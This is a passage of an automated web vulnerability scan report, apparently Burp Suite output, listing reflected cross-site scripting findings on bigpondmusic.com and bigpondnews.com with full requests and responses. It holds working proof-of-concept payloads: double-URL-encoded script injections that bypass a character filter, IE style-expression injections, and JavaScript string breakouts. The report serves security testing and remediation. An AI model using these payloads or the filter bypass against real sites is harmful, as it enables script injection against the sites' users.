HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 107758
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f408%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3052a20ef0 was submitted in the REST URL parameter 1. This input was echoed as 9f408"><script>alert(1)</script>b3052a20ef0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news9f408%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb3052a20ef0/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:45 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88022
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f547a'%3b77363121576 was submitted in the REST URL parameter 1. This input was echoed as f547a';77363121576 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /newsf547a'%3b77363121576/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87971
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 235a2'%3bd3bafbd4249 was submitted in the REST URL parameter 2. This input was echoed as 235a2';d3bafbd4249 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /news/article235a2'%3bd3bafbd4249/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88065
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e458a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ca07dca643 was submitted in the REST URL parameter 2. This input was echoed as e458a"><script>alert(1)</script>1ca07dca643 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/articlee458a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1ca07dca643/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88209
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8eb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25e9ca5a695 was submitted in the REST URL parameter 4. This input was echoed as f8eb0"><script>alert(1)</script>25e9ca5a695 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011f8eb0%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e25e9ca5a695 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 118667
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Nick Cave And The Bad Seeds ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011f8eb0"><script>alert(1)</script>25e9ca5a695" /> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a4bdc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef1173296c3 was submitted in the REST URL parameter 4. This input was echoed as a4bdc'style='x:expression(alert(1))'ef1173296c3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011a4bdc%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527ef1173296c3 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:15:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 118544
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Nick Cave And The Bad Seeds ...[SNIP]... <link rel='canonical' href='http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011a4bdc'style='x:expression(alert(1))'ef1173296c3' /> ...[SNIP]...
2.397. http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c248"style%3d"x%3aexpression(alert(1))"d354a3a5ee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3c248"style="x:expression(alert(1))"d354a3a5ee6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011?3c248"style%3d"x%3aexpression(alert(1))"d354a3a5ee6=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 118232
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Nick Cave And The Bad Seeds ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/news/article/5084/nick-cave-and-the-bad-seeds-to-release-new-album-in-2011?3c248"style="x:expression(alert(1))"d354a3a5ee6=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ddea'%3b2c2553be200 was submitted in the REST URL parameter 1. This input was echoed as 8ddea';2c2553be200 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search8ddea'%3b2c2553be200 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87922
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ae5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e575939b96dc was submitted in the REST URL parameter 1. This input was echoed as 4ae5d"><script>alert(1)</script>575939b96dc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /search4ae5d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e575939b96dc HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:29:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88056
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.400. http://bigpondmusic.com/search [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/search
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28209"style%3d"x%3aexpression(alert(1))"5214d55964b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 28209"style="x:expression(alert(1))"5214d55964b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /search?28209"style%3d"x%3aexpression(alert(1))"5214d55964b=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:29:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87953
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be2aa'%3b45aad6d3561 was submitted in the REST URL parameter 1. This input was echoed as be2aa';45aad6d3561 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /urlshortenbe2aa'%3b45aad6d3561/totwitter HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87822
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37397%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee604c687f12 was submitted in the REST URL parameter 1. This input was echoed as 37397"><script>alert(1)</script>e604c687f12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /urlshorten37397%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee604c687f12/totwitter HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:19 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88353
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf323%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0865f5989db was submitted in the REST URL parameter 2. This input was echoed as bf323"><script>alert(1)</script>0865f5989db in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /urlshorten/totwitterbf323%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e0865f5989db HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88353
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a13d'%3b4ae2072be75 was submitted in the REST URL parameter 2. This input was echoed as 8a13d';4ae2072be75 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /urlshorten/totwitter8a13d'%3b4ae2072be75 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 02:48:34 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88011
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96bfa'%3b183c98526e3 was submitted in the REST URL parameter 2. This input was echoed as 96bfa';183c98526e3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /articles/Crime96bfa'%3b183c98526e3/2010/11/22/PNG_boy_gang_raped_by_women_542337.html HTTP/1.1 Host: bigpondnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Tue, 23 Nov 2010 03:30:40 GMT Server: Apache/2.2.14 (Unix) mod_jk/1.2.28 Set-Cookie: JSESSIONID=3D07BCFEC9511A98463FC2810D3FFD1D; Path=/ Content-Language: en Content-Length: 55078 Expires: Tue, 23 Nov 2010 03:35:40 GMT Vary: Accept-Encoding,User-Agent X-UA-Compatible: IE=EmulateIE7 Cache-control: public Connection: close Content-Type: text/html;charset=ISO-8859-1
